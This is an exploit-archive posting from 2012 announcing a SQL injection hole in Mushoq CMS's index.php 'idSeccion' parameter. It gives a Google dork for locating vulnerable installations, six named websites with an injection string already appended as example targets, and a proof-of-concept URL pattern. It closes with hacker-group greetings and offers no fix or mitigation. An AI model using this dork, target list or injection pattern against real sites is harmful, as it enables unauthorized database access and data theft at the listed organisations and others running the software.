Mushoq CMS SQL injection Vulnerability



EKU-ID: 1984 CVE: OSVDB-ID:
Author: xDarkSton3x Published: 2012-04-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##################################################
# Exploit Title: Mushoq CMS SQL injection Vulnerability
# Vendor: http://www.mushoq.com/
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
#Twitter: @xdarkston3x
# Category: webapps
# Google dork: intext:desarrollo Web mushoq inurl:index.php?idSeccion=
# Example Sites :
http://www.clave.com.ec/index.php?idSeccion=%27
http://www.edesa.com.ec/index.php?idSeccion=%27
http://www.rvc.com.ec/index.php?idSeccion=%27
http://www.cip.org.ec/index.php?idSeccion=%27
http://www.cgbseguridad.com/index.php?idSeccion=%27
http://www.verdesintetico.com/index.php?idSeccion=%27

##################################################

[~]Exploit/p0c :
http://www.site.com/index.php?idSeccion=[sqli]

Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng]